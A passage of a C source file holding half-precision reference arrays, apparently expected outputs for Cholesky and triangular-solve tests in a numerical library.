0x3331, 0xb4f0, 0x3509, 0x30e2, 0x3311, 0xa7f3, 0x3479, 0x3706, 0xa99d, 0x2911, 0x3323, 0xb684, 0xa0cc, 0x340b, 0x317a, 0x2fe6, 0x302d, 0x3508, 0x2ecc, 0xaeb8, 0x2d9f, 0xb64c, 0xb451, 0xb83e, 0x35ee, 0xb5cf, 0x2ac0, 0x34e9, 0x31f1, 0xb188, 0x1e21, 0x323b, 0x34e1, 0xa780, 0x380c, 0x2912, 0xb1fc, 0xb189, 0xaf03, 0xb654, 0xb72f, 0xaf40, 0x293a, 0x32dc, 0x3250, 0xaf43, 0xa013, 0x3450, 0xb045, 0xaa0c, 0x305c, 0xae43, 0x34e2, 0xae62, 0x3701, 0xb97b, 0x2eec, 0x3054, 0x30a3, 0x31fd, 0xb22b, 0xb589, 0x3939, 0x1db0, 0xa639, 0xb24a, 0x31ce, 0x2b87, 0x361d, 0xb09c, 0x3089, 0x33de, 0x2e46, 0xb081, 0xb8e5, 0x2a59, 0xb732, 0x2888, 0x27f8, 0x2b97, 0x3482, 0xa9fc, 0xb06a, 0xb7b9, 0xaff3, 0x3135, 0x28a2, 0x2d7d, 0xb43f, 0xa29f, 0xb1e4, 0x30f5, 0xbb7f, 0x3841, 0xae1a, 0xa616, 0xb21f, 0xacc1, 0x2cec, 0xa914, 0x26fb, 0x2ea9, 0x334a, 0xb54a, 0xb0e0, 0xb895, 0x3725, 0x30d6, 0xb66f, 0x184a, 0xb0d7, 0x2a40, 0xb848, 0xb062, 0xa6b2, 0x2fc0, 0x2db5, 0x2d13, 0xb8a1, 0xb585, 0xb4d0, 0xa824, 0x34d3, 0x341a, 0x301e, 0xaeff, 0x26ac, 0xb68e, 0xa69d, 0xb1f9, 0xa9cd, 0x2008, 0x2f55, 0xb5f0, 0xb399, 0xb42d, 0x348a, 0x302b, 0xb5d9, 0x3299, 0x33d3, 0x17f3, 0x348b, 0xb6cd, 0xba6d, 0x2e52, 0x347c, 0x3446, 0xad1f, 0x3054, 0xafc8, 0xaf5b, 0xb196, 0x318c, 0x3463, 0xa761, 0x20f7, 0xa2c2, 0xaf0b, 0x32a3, 0x3861, 0x3048, 0xb471, 0xaa05, 0xb7f5, 0x3141, 0xb11b, 0x2d8a, 0xb827, 0x338d, 0x3449, 0x2eb6, 0xb47e, 0x31f9, 0x2fdf, 0xac15, 0x2d5f, 0xb5d9, 0xabc3, 0x2503, 0xadb1, 0x2db8, 0x3162, 0x3563, 0xae0d, 0x24be, 0x35ca, 0x1c37, 0xa57d, 0x396f, 0x3501, 0x3519, 0xaea8, 0xafe8, 0x3843, 0xb513, 0x2c1d, 0x23a3, 0x2eed, 0xae46, 0xadff, 0xa93a, 0x2c6e, 0x38bc, 0xb4ca, 0x36aa, 0x2ff5, 0x2c0d, 0x32fe, 0x3786, 0xb6c1, 0xad0e, 0xb52d, 0x307f, 0xa824, 0x390e, 0x2c0f, 0xa246, 0x31a6, 0xb585, 0xb4d6, 0xb374, 0x32b2, 0x376a, 0xb343, 0x2c89, 0xb26b, 0xa87a, 0x3443, 0xb109, 0xb8d3, 0x2ec6, 0x2a80, 0xba0d, 0xb1dd, 0xac89, 0xb169, 0x3148, 0xb35c, 0xa274, 0x3465, 0x24e8, 0x2205, 0x290d, 0xb575, 0x316e }; static const uint16_t ref_cholesky_dpo[709] = { 0x3800, 0x3aee, 0x0, 0x349e, 0x3a88, 0x39dc, 0x0, 0x0, 0xb41c, 0x39eb, 0x0, 0x34c9, 0x2bf0, 0x3af6, 0x3b28, 0x0, 0x0, 0x0, 0x39d2, 0x3242, 0x0, 0x0, 0x3863, 0x2cd6, 0x357a, 0x0, 0x39b2, 0xad02, 0xb662, 0x32f9, 0x3ce2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3cfb, 0x3b3e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d68, 0x3822, 0x3696, 0x0, 0x0, 0x0, 0x0, 0x390d, 0x3665, 0xb3c3, 0x3785, 0x0, 0x0, 0x0, 0x3b8d, 0x2e17, 0x3715, 0x24c0, 0x3800, 0x0, 0x0, 0x3aa4, 0x39d3, 0x282a, 0x2879, 0xb5ef, 0x30f3, 0x0, 0x37af, 0x38b8, 0xb058, 0x30ad, 0xb055, 0xb0b5, 0x2e5c, 0x3ce8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c09, 0x394a, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d7c, 0x3a06, 0x34fd, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38e5, 0x3805, 0xa946, 0x34c8, 0x0, 0x0, 0x0, 0x0, 0x3b04, 0x349c, 0x2c95, 0x2d18, 0x38c4, 0x0, 0x0, 0x0, 0x3892, 0x390a, 0xb543, 0xb0bb, 0x36d6, 0x3127, 0x0, 0x0, 0x3b1b, 0x382e, 0x33fe, 0x2af6, 0xad5b, 0xa7dd, 0x367b, 0x0, 0x3af2, 0xb16d, 0xad95, 0x3214, 0x28ec, 0x3275, 0x1c4c, 0x35e5, 0x3bec, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d5c, 0x3a14, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b6f, 0x3721, 0x3757, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d3e, 0x382e, 0x300b, 0x3950, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c2d, 0x3407, 0x2581, 0x312a, 0x363e, 0x0, 0x0, 0x0, 0x0, 0x3ca5, 0x373b, 0x1c3c, 0x9b0c, 0xb699, 0x3519, 0x0, 0x0, 0x0, 0x3bcd, 0x363b, 0xb1ab, 0x26a9, 0xb54c, 0xb5fd, 0x37fc, 0x0, 0x0, 0x3d1f, 0x37f2, 0xb563, 0xb446, 0xafc6, 0x28af, 0x29d0, 0x329b, 0x0, 0x3d01, 0x384f, 0xa789, 0x31e7, 0xacb6, 0xb455, 0xb1fb, 0x3581, 0x341a, 0x3eea, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b5c, 0x3c24, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d62, 0x344b, 0x3bb4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b1c, 0x30ba, 0x3938, 0x3a00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d50, 0x369c, 0x2e8e, 0x2edb, 0x3b14, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3ad5, 0x3856, 0x3629, 0xb1ad, 0xb048, 0x397a, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d56, 0x3841, 0x3066, 0xa507, 0xad8b, 0xb51b, 0x391c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d94, 0x3b13, 0x35b8, 0x3292, 0x376d, 0x34a4, 0x3137, 0x3842, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f4d, 0x3a9a, 0xb0d7, 0x31cb, 0xa43d, 0x2b92, 0x267b, 0xab1d, 0x3817, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c15, 0x3604, 0x37a1, 0x3170, 0xac07, 0xad49, 0x2a90, 0x3410, 0xae21, 0x38ea, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a7a, 0x3621, 0xa54f, 0x3559, 0x2729, 0xac21, 0x3561, 0x3578, 0x2391, 0x3616, 0x330e, 0x0, 0x0, 0x0, 0x0, 0x3c72, 0x2a70, 0x3882, 0x3442, 0x3614, 0x28a5, 0x351a, 0x3440, 0x2f12, 0x2c65, 0xa8fc, 0x3800, 0x0, 0x0, 0x0, 0x3d67, 0x3872, 0x2e37, 0x3730, 0xb246, 0x2c69, 0x3421, 0xad46, 0xb203, 0x32f3, 0x2283, 0xa532, 0x3626, 0x0, 0x0, 0x3df0, 0x2d63, 0xb3ac, 0xb0ee, 0x33c7, 0x36eb, 0xad4c, 0x320a, 0x347c, 0x35a1, 0x2968, 0xa06e, 0xaa51, 0x32ca, 0x0, 0x3b99, 0xaa15, 0x37f5, 0x37ae, 0xb344, 0xabc2, 0x2949, 0x9f22, 0x3662, 0x2f25, 0x3072, 0xabd1, 0x1e76, 0xac2f, 0x297c, 0x3400, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x35a8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x36ee, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3800, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3879, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38e6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x394b, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x39a8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a53, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3aa2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3aee, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b36, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3bbf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x3aee, 0x0, 0x349e, 0x3a88 }; static const uint16_t ref_uptriangular_dpo[709] = { 0xc000, 0x2ed0, 0x386f, 0x3ce6, 0xb633, 0x3adf, 0xbc0e, 0x3d46, 0xb612, 0xb321, 0x3b18, 0xb99e, 0x3c99, 0xbc0a, 0x448a, 0xbced, 0xc244, 0x487a, 0xc2b8, 0x4244, 0x3eae, 0xc4a1, 0xbfa0, 0xbf13, 0x397e, 0xc426, 0xbe59, 0xb9c8, 0x3e32, 0xc194, 0xb2d8, 0xb67b, 0xbfc4, 0x30d8, 0xb9f4, 0xb65d, 0xbf77, 0x40ae, 0xbb55, 0x4217, 0x3f07, 0xba1e, 0xb6df, 0x4106, 0x443b, 0x3f46, 0x46d2, 0x3e44, 0xb7f8, 0x2735, 0x42cc, 0xa9e7, 0x40ea, 0x3a4c, 0xafa9, 0xb695, 0xb4e4, 0x3b48, 0xc428, 0xbfd2, 0xc589, 0xc063, 0x3aa5, 0x39a4, 0xc159, 0xc437, 0xb98b, 0xc4c7, 0xbd8b, 0x413c, 0x93dc, 0xc281, 0xbf5b, 0xb930, 0xc473, 0xbf2a, 0xb86b, 0x3d39, 0xc20f, 0xbc0f, 0xaf00, 0x4337, 0x3c77, 0xbe64, 0x41ba, 0x4043, 0xb99c, 0x31c3, 0xc9ee, 0xc5a4, 0x4637, 0xc347, 0xca66, 0xc111, 0x46aa, 0x403f, 0x4626, 0xb69f, 0xc53a, 0x422c, 0x46e6, 0xbcbf, 0xc409, 0xc0b2, 0x40b5, 0x44c7, 0x2945, 0x34db, 0x42da, 0x3df1, 0x322e, 0xbc49, 0xc0e2, 0xbad4, 0x4139, 0xba20, 0xc38c, 0x2ad5, 0x40d6, 0xb601, 0x4496, 0x3ca0, 0xc014, 0x3cc8, 0x4418, 0x3e44, 0xc2b8, 0x3717, 0xb50d, 0x3878, 0x34fb, 0xb700, 0xb8c2, 0x3c44, 0x3ad3, 0x31ae, 0x3cfc, 0xbdf1, 0xbece, 0x3d7c, 0xbe29, 0xbbe0, 0xb8a6, 0x4648, 0xc1a9, 0x43f6, 0xbc0e, 0xc1ec, 0x427f, 0xc422, 0xc335, 0xc46e, 0x4765, 0xc26a, 0x40f3, 0xba01, 0xbcc0, 0x42bd, 0xbaf0, 0xbdb8, 0xc43d, 0x3a21, 0x33b8, 0x384a, 0xbf37, 0xc124, 0xbfe5, 0xbca3, 0xc3b3, 0x3dae, 0x438a, 0xc34f, 0x4256, 0xbc5f, 0xc419, 0x3e3f, 0xb9f2, 0xc541, 0xbd0c, 0xc94a, 0x45e8, 0xc47b, 0x427a, 0x45ce, 0xc29e, 0x4313, 0x4844, 0x43e8, 0xc847, 0x4434, 0xc49f, 0x415b, 0x46e4, 0xbf54, 0x3f3d, 0x4808, 0x4129, 0xc0f8, 0x3907, 0x34a2, 0x38e5, 0x3eca, 0xbee8, 0x3a44, 0x4329, 0x3d55, 0x43ad, 0xc015, 0x4051, 0xc08f, 0xc523, 0x3adb, 0xb86c, 0xc81e, 0x35d4, 0xc1aa, 0x409e, 0xc331, 0x3d00, 0x41a8, 0xbcd8, 0x3d8b, 0x43ce, 0x3d18, 0x3298, 0xbc8f, 0xbfcd, 0xb2c8, 0x3c45, 0x4399, 0xbc09, 0x3d60, 0x3eef, 0x3dbd, 0x3c5d, 0xc3f7, 0xbc86, 0x424b, 0xc0f4, 0x38d8, 0x3eec, 0xc3d5, 0x4365, 0xca97, 0x4ac0, 0xb41e, 0x45a6, 0x45a4, 0x45e0, 0x2ef6, 0xc486, 0x3d65, 0x4a1e, 0xc534, 0x402f, 0xb153, 0x4597, 0xc150, 0x44d8, 0xc9d1, 0xbc31, 0xc67e, 0xc91d, 0xc66e, 0xc0fd, 0x4824, 0xb21e, 0xc977, 0x44f6, 0x3d01, 0x3c21, 0x3efa, 0xc1c6, 0x43ed, 0xc203, 0xbf14, 0xba4a, 0xb25a, 0x37fc, 0x3844, 0x3ef4, 0xbc66, 0xc035, 0x3afd, 0xb7d3, 0x384c, 0x390f, 0x39de, 0x375a, 0x3e1c, 0x3b8b, 0x3871, 0x3e2d, 0x3c86, 0x35a7, 0xbe9e, 0x31b2, 0x3c1b, 0xb89d, 0x1f31, 0x34b4, 0xb49a, 0xbe73, 0x42b8, 0x3dc8, 0x319c, 0x3a1f, 0x419b, 0x3c9d, 0x3cbf, 0xc0e5, 0xbe17, 0xb1f7, 0xba89, 0xb570, 0x35dd, 0xbffa, 0x3f28, 0xc030, 0x43c9, 0x376c, 0x4216, 0x432c, 0x41c0, 0x3bb2, 0xc06b, 0x380e, 0x4419, 0xbe2e, 0xbc9f, 0xbe19, 0xc0d9, 0x4086, 0xc1e0, 0x41a1, 0x37b4, 0x41b6, 0x4013, 0x39bd, 0x35df, 0xc1c6, 0x38f4, 0x4275, 0xb7db, 0xb9df, 0xbad1, 0x4499, 0xc526, 0x49fb, 0xcb81, 0xa854, 0xc728, 0xc6a1, 0xc75f, 0xb63d, 0x460e, 0xbd1f, 0xcae2, 0x4426, 0xc084, 0x2c43, 0xc041, 0x374f, 0x4222, 0x3403, 0x3f80, 0x39cf, 0x4329, 0x3b4c, 0x3ff7, 0xc1be, 0xb682, 0x40b0, 0xbf54, 0x43a3, 0x3b61, 0x45ea, 0xc66b, 0x47b7, 0xc846, 0xc2be, 0xc65d, 0xc7ab, 0xc4f0, 0xc015, 0x45ca, 0xc0d7, 0xc951, 0x4492, 0xb6d5, 0xb71a, 0xbb05, 0x2fcf, 0xbfab, 0x4018, 0x3618, 0xb528, 0x3800, 0x3518, 0xb645, 0x32e1, 0x3b0e, 0x3ecf, 0xba7d, 0xb9bc, 0xb825, 0xb816, 0x4039, 0xc190, 0xbef2, 0x3cef, 0x307c, 0xbb69, 0x28aa, 0xbafa, 0x4078, 0x3d7a, 0x35b3, 0x3f69, 0x3923, 0x3e02, 0xb88d, 0x3fbe, 0xc5a7, 0x4184, 0xba7c, 0x3ebd, 0x334d, 0x3ee9, 0xbc7a, 0x3f59, 0x3cd5, 0x4261, 0xb140, 0xb9cf, 0x38c2, 0xc5bd, 0x469b, 0xcab1, 0x4c3b, 0x4053, 0x47d0, 0x488e, 0x46ff, 0x38d6, 0xc8ab, 0x3e9a, 0x4b12, 0xc55d, 0x3aa1, 0x3809, 0xb558, 0x386c, 0x28ac, 0x367a, 0xae25, 0xbdc3, 0x38ac, 0xbf53, 0xbd91, 0xb752, 0x36ae, 0x3bfc, 0xb520, 0x3f38, 0x3e60, 0xc10b, 0x3df6, 0xb475, 0xbbb7, 0xbe20, 0xbf5d, 0xbc30, 0x3d8f, 0xbd3d, 0xb8bf, 0x3bc9, 0x3853, 0x3ae7, 0x3d8c, 0xbcc5, 0x2d81, 0x3d77, 0xbb15, 0x3c67, 0xb76a, 0x3600, 0x3446, 0xad0a, 0xb57f, 0x3d91, 0x3878, 0x3a23, 0x39f3, 0x2da4, 0xbd61, 0xbcf2, 0x348a, 0x2988, 0x33c2, 0x3c85, 0x3533, 0x3b9d, 0xbc01, 0x3e71, 0x3d8c, 0xb6fa, 0x38ab, 0xb08b, 0xbfe8, 0xbb35, 0xbbb4, 0x3cb4, 0x3caa, 0xb7fb, 0xb630, 0x36ef, 0x383c, 0xbae0, 0xb300, 0x384a, 0xb384, 0xb9e8, 0xbbd7, 0x2c23, 0xb884, 0x391a, 0xbc8f, 0xb8be, 0xb360, 0x36ec, 0xb7fe, 0xbc92, 0x37f3, 0xbc79, 0x3755, 0xb9e7, 0xbe62, 0x3061, 0xb3ef, 0x3b09, 0x3be3, 0x39d5, 0x393e, 0x3976, 0x3310, 0x30bd, 0xb7c9, 0xb883, 0x2cdc, 0xbb8d, 0xb707, 0xbc43, 0xb848, 0xb34f, 0x23cc, 0xb21d, 0x3803, 0xb591, 0xb4d8, 0x3b5a, 0x39d4, 0xb697, 0xb4e1, 0x3511, 0x3555, 0x3c9e, 0x2c41, 0xb5c2, 0xb73a, 0xbd91, 0x3991, 0xb406, 0xb6e4, 0x3b77, 0x36f8, 0x371b, 0x3262, 0x388b, 0x381d, 0x3452, 0xaf15, 0xb8a9, 0x33e8, 0xb9c0, 0xba3e, 0xb7bc, 0xafdc, 0x3609, 0x31ae, 0x2dda, 0xa45b, 0x389e, 0xb900, 0xa2fc, 0xb8c6, 0x367c, 0xb826, 0x34cf, 0x3bc7, 0xbbf8, 0x3724, 0xb8fa, 0xb914, 0xb6a2, 0x3bc1, 0xb4dd, 0x33d5, 0xb030, 0xb692, 0x343d, 0xb954, 0xab82, 0x3427, 0xacef, 0x37f9, 0xb083, 0x3426, 0x3256, 0x2e87, 0xa07d, 0x322a, 0xb895, 0x3667, 0xa8aa, 0xac80, 0x28b3, 0xa6ae, 0xb138, 0xb76d, 0xae11, 0x295a, 0x37e4, 0xa73c, 0xaa96, 0xbb36, 0xaa93, 0x34d0, 0x38a3, 0x33c0, 0x3850, 0x38e6, 0xa82c, 0x3626, 0x3837, 0x39f8, 0x3a81, 0x31f4, 0xb8b7, 0x305c, 0xb58f, 0x37af, 0xb770, 0x3389, 0x3345, 0xaebf, 0xb435, 0xb05f, 0xb1f9, 0xbc47, 0xae42, 0xb66d, 0xb404, 0x1721, 0xba68, 0x38c4, 0x3196, 0x377c, 0x3451, 0x3961, 0xb8e9, 0xa26f, 0xac09, 0x37b3, 0xafd7, 0xb219, 0x36d7, 0x9aad, 0xb340, 0x9a4c, 0xa697, 0x344e, 0x38b7, 0x31e4, 0xb34e, 0xb18d, 0x39ea, 0x2eb1, 0x33f9, 0xaadd, 0x3594, 0xb6c6, 0x3884, 0x2dad, 0xb527, 0xb8ee, 0x2fcd, 0x3456, 0xb367, 0x34b2, 0xb543, 0xb914, 0xb18c, 0x3437, 0xba47, 0xbc59, 0xbbe4, 0xb282, 0x3c6b }; static const uint16_t ref_lotriangular_dpo[709] = { 0xc000, 0x381e, 0x36cd, 0x3c2c, 0xb84d, 0x39a4, 0xb776, 0x38c1, 0xb232, 0xb49d, 0x3c09, 0xbb72, 0x3d52, 0xbd25, 0xb902, 0xb57d, 0xafbe, 0x36e8, 0xbc88, 0x4404, 0x3f10, 0xc6b9, 0x3cc8, 0xbd0e, 0xbd42, 0xaedf, 0x407a, 0xb792, 0x3184, 0xc6cf, 0x2781, 0xb4ab, 0xb0d4, 0x3462, 0xad60, 0x2e0f, 0xb84a, 0xb55b, 0x36c3, 0x3162, 0xb4a9, 0x39bf, 0x33db, 0x39c6, 0x361b, 0xbc95, 0x3f1d, 0xba35, 0x366e, 0xad55, 0x3e57, 0xb939, 0x3e46, 0xb220, 0xbd8c, 0xb92b, 0xb405, 0x385e, 0xbab0, 0x3128, 0xc033, 0xb674, 0xbd16, 0x32b6, 0x215d, 0xc1f9, 0xb343, 0xc5e4, 0xb45a, 0xc18c, 0xc0a8, 0xbd4b, 0xc413, 0xc5bc, 0xcacc, 0xbd70, 0xc860, 0xc307, 0xc54e, 0xb116, 0xba2f, 0x317f, 0x3585, 0xb538, 0xb871, 0x34e4, 0x39e0, 0x384d, 0x3acb, 0xbcc5, 0xb5b6, 0x39b4, 0x3984, 0xb8e4, 0xb36e, 0x4094, 0x3cbb, 0x3837, 0xc0d2, 0x38b3, 0x3ff8, 0xbf0a, 0xbf24, 0xc109, 0x37c9, 0x44dd, 0x3485, 0xb0c9, 0xb70a, 0x373c, 0x3b68, 0xbd6d, 0x3dfb, 0xb8b4, 0x3b4c, 0x3538, 0xb869, 0x3bad, 0xbc1a, 0x442f, 0x4486, 0x492c, 0xc992, 0x3e3e, 0x46ad, 0xc44a, 0xc605, 0xbb7f, 0x30ee, 0x3d8f, 0x3a52, 0xba47, 0xbc3e, 0x4025, 0xb0f8, 0x37fe, 0x3ad1, 0xc939, 0x4134, 0x3f38, 0xc19a, 0xb697, 0x2d95, 0xb411, 0x3456, 0x36a7, 0x38f4, 0x365e, 0x3429, 0x3488, 0x30fa, 0x2d8a, 0x3e13, 0xbbce, 0xbbe6, 0xbd1a, 0xb964, 0xb856, 0x39b7, 0xb9d5, 0x33c4, 0xbd9f, 0x3c38, 0xb227, 0xb8b5, 0xb8a2, 0xbe67, 0xc0de, 0xa4fd, 0x1e18, 0xbe70, 0xb9cb, 0x33b3, 0x3ae2, 0x2abc, 0x3390, 0x2d9c, 0x3e56, 0xb6b1, 0x35a0, 0x3d17, 0xb65f, 0xba5c, 0xc0f1, 0xb4cb, 0xb401, 0xbf32, 0xb79b, 0xc31d, 0x4295, 0xc091, 0xba9c, 0xbf22, 0x3a3f, 0xc161, 0xc080, 0xbd39, 0xc49d, 0x4312, 0xb43e, 0xbeb7, 0xc289, 0xbde5, 0xc3e5, 0xbd58, 0xb9ec, 0xc57c, 0x4148, 0xc3a0, 0xba23, 0xc122, 0xc388, 0xc461, 0x39b8, 0x3b99, 0xc2e4, 0x468d, 0xbd63, 0xbc4e, 0x3955, 0x420c, 0xbf05, 0xbd2e, 0xc160, 0x3365, 0x34aa, 0xb187, 0x2688, 0x3526, 0xb833, 0xafb6, 0xaf92, 0xa619, 0x2b15, 0xb60d, 0x319f, 0x1c96, 0x348d, 0xadaf, 0xb85b, 0x34fb, 0xacd5, 0xb72d, 0xbcd7, 0xb031, 0x35d8, 0x38f8, 0x3ba0, 0xb086, 0x37ef, 0xaf75, 0xac07, 0xb0fc, 0xabd6, 0x34c5, 0xb841, 0x381b, 0x364d, 0xa43d, 0x3cbd, 0x3b44, 0xaf22, 0xb2d5, 0x32f4, 0x3687, 0xb9c6, 0x29c3, 0x32a0, 0x3355, 0x3484, 0x37e4, 0x30f7, 0xbbcc, 0xb608, 0xb448, 0xbb80, 0x30f3, 0x3c34, 0x3a21, 0xb327, 0x33d4, 0xb01c, 0x2bd2, 0x3adb, 0xb8ba, 0xb998, 0x3c7b, 0x381d, 0x3318, 0x3a92, 0x241d, 0xb4f0, 0xbb37, 0xb5ba, 0xaa22, 0x2830, 0x396a, 0xb627, 0x33b7, 0xb159, 0xb217, 0x1f2f, 0xb89d, 0x3a30, 0x394f, 0xbcc9, 0x3826, 0x3799, 0x360d, 0xb463, 0x3410, 0xb692, 0xb9bb, 0x3943, 0x348e, 0xbc53, 0x298e, 0xae9d, 0x3781, 0x3fea, 0xbbd5, 0x35aa, 0xa5b2, 0x3a18, 0xae69, 0x34df, 0x3154, 0xb755, 0x3d64, 0x3b86, 0xb7f7, 0xbdb6, 0xad58, 0x370d, 0x3474, 0xb9a1, 0xb936, 0xbd83, 0xbc35, 0xb2f1, 0xba2f, 0xb953, 0x3b4e, 0xb963, 0xaf3f, 0xbd54, 0x3c5d, 0x3ce1, 0xb73c, 0x41d1, 0x3b86, 0xbd9e, 0xbfd7, 0xbe6e, 0x2827, 0xbca3, 0x37f3, 0xc00d, 0xb841, 0xbaa9, 0x3bb9, 0x3936, 0xa9bc, 0x3c8c, 0xb515, 0x2d77, 0xbb2d, 0xad4e, 0xad8b, 0xa624, 0x3d39, 0x2ac4, 0xbafb, 0x375e, 0x4197, 0x2e82, 0x4368, 0x376f, 0xc288, 0x3f67, 0x3cb4, 0x35cb, 0xc103, 0xb779, 0xb7f5, 0xbf9d, 0xb7cb, 0xbde2, 0xbc2c, 0xbc83, 0x3a6e, 0xb8a1, 0xbcd4, 0xbe0f, 0xc117, 0x39db, 0xb49e, 0x39a5, 0xb971, 0x336d, 0x3e8e, 0x333f, 0xb5f7, 0xbdff, 0xbcf6, 0xc2f5, 0x2fac, 0x4488, 0xc097, 0x395f, 0x428d, 0xbdab, 0xc4e4, 0xc183, 0x3101, 0xb433, 0x3f71, 0xba04, 0xb7b7, 0x3b81, 0xb81c, 0xb04b, 0xb5e2, 0xc6de, 0xc1f8, 0x3d9f, 0x4193, 0x3c84, 0x4137, 0x40b5, 0x41ca, 0x3ca9, 0x40a2, 0x40fe, 0xcd99, 0x4116, 0xcf3b, 0xbf3c, 0xcc01, 0xccdc, 0xc5aa, 0x4ee8, 0x4ec8, 0x4a2e, 0x4a00, 0x4a5f, 0x438c, 0x4fc9, 0xc60b, 0x3aa1, 0x3809, 0xb558, 0x386c, 0x28ac, 0x367a, 0xae25, 0xbdc3, 0x38ac, 0xbf53, 0xbd91, 0xb752, 0x36ae, 0x3bfc, 0xb520, 0x3f38, 0x3e60, 0xc10b, 0x3df6, 0xb475, 0xbbb7, 0xbe20, 0xbf5d, 0xbc30, 0x3d8f, 0xbd3d, 0xb8bf, 0x3bc9, 0x3853, 0x3ae7, 0x3d8c, 0xbcc5, 0x2d81, 0x3d77, 0xbb15, 0x3c67, 0xb76a, 0x3600, 0x3446, 0xad0a, 0xb57f, 0x3d91, 0x3878, 0x3a23, 0x39f3, 0x2da4, 0xbd61, 0xbcf2, 0x348a, 0x2988, 0x33c2, 0x3c85, 0x3533, 0x3b9d, 0xbc01, 0x3e71, 0x3d8c, 0xb6fa, 0x38ab, 0xb08b, 0xbfe8, 0xbb35, 0xbbb4, 0x3cb4, 0x3caa, 0xb7fb, 0xb630, 0x36ef, 0x383c, 0xbae0, 0xb300, 0x384a, 0xb384, 0xb9e8, 0xbbd7, 0x2c23, 0xb884, 0x391a, 0xbc8f, 0xb8be, 0xb360, 0x36ec, 0xb7fe, 0xbc92, 0x37f3, 0xbc79, 0x3755, 0xb9e7, 0xbe62, 0x3061, 0xb3ef, 0x3b09, 0x3be3, 0x39d5, 0x393e, 0x3976, 0x3310, 0x30bd, 0xb7c9, 0xb883, 0x2cdc, 0xbb8d, 0xb707, 0xbc43, 0xb848, 0xb34f, 0x23cc, 0xb21d, 0x3803, 0xb591, 0xb4d8, 0x3b5a, 0x39d4, 0xb697, 0xb4e1, 0x3511, 0x3555, 0x3c9e, 0x2c41, 0xb5c2, 0xb73a, 0xbd91, 0x3991, 0xb406, 0xb6e4, 0x3b77, 0x36f8, 0x371b, 0x3262, 0x388b, 0x381d, 0x3452, 0xaf15, 0xb8a9, 0x33e8, 0xb9c0, 0xba3e, 0xb7bc, 0xafdc, 0x3609, 0x31ae, 0x2dda, 0xa45b, 0x389e, 0xb900, 0xa2fc, 0xb8c6, 0x367c, 0xb826, 0x34cf, 0x3bc7, 0xbbf8, 0x3724, 0xb8fa, 0xb914, 0xb6a2, 0x3bc1, 0xb4dd, 0x33d5, 0xb030, 0xb692, 0x343d, 0xb954, 0xab82, 0x3427, 0xacef, 0x37f9, 0xb083, 0x3426, 0x3256, 0x2e87, 0xa07d, 0x322a, 0xb895, 0x3667, 0xa8aa, 0xac80, 0x28b3, 0xa6ae, 0xb138, 0xb76d, 0xae11, 